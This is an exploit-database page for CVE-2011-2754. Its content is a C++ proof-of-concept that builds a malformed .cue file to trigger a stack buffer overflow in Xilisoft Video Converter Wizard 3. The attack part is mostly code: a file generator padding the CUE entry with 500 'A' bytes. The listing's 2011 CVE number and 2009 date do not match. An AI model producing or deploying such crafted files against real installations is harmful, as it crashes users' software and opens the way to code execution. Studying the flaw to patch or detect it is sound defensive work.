Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2011-2754 | CWE-119 | $0 | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Richard James | High | Local | 2009-04-28 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
/* ---------------------------------------------------------------------------------------- Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC name: xilisoft.cpp Credits : fl0 fl0w ---------------------------------------------------------------------------------------- ScreanShot in the debugger Link: http://www.downloadatoz.com/xilisoft-video-converter/wizard.html http://img23.imageshack.us/my.php?image=xilisoftvideoconverter.jpg ---------------------------------------------------------------------------------------- */ //Start #include <stdio.h> #include <string.h> #include <stdio.h> #include <assert.h> #include <windows.h> #define SIZE 100000 #define FILE_FF " BINARY.. TRACK 01 MODE2/2352.. INDEX 01 00:00:00.." class EXPLOIT { public: int check (char *, char *); void Usage (char *); }; static int Poz = 1; static int Neg = 0; int i; char Name [SIZE]; char NeWbuff [SIZE]; int main (int argc, char *argv []) { EXPLOIT VIDEO; if ( argc < 2) VIDEO.Usage ( argv [0]); if ( VIDEO.check ( argv [1], "-file") == Neg) { fprintf ( stdout , " Incorect input "); printf ( " \t..Usage is %s -file filename.. \n", Name); exit ( 0); } do { NeWbuff [i] = 'A'; i++; }while (i < 500); FILE *f; strcpy (Name, argv [2]); strcat (Name, " .cue "); f = fopen (Name, "w"); assert ( f != NULL); strncpy ( NeWbuff + 500 , FILE_FF , strlen ( FILE_FF)); fputs("FILE \"", f); fprintf ( f, " %s ", NeWbuff); fprintf ( stdout , "File build ! "); exit ( 0); getchar (); return 0; } int EXPLOIT::check (char *Arg_, char *_Arg) { if ( strcmp ( Arg_, _Arg) == 0) return Poz; return Neg; } void EXPLOIT::Usage (char *Name) { system ("cls"); fprintf ( stdout , " \n..Xilisoft Video Converter Wizard 3 .CUE File Stack Buffer Overflow POC..\n "); printf ( " \t..Usage is %s -file filename.. \n", Name); fprintf ( stdout , "..All Credits fl0 fl0w.. \n"); } //EOF
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.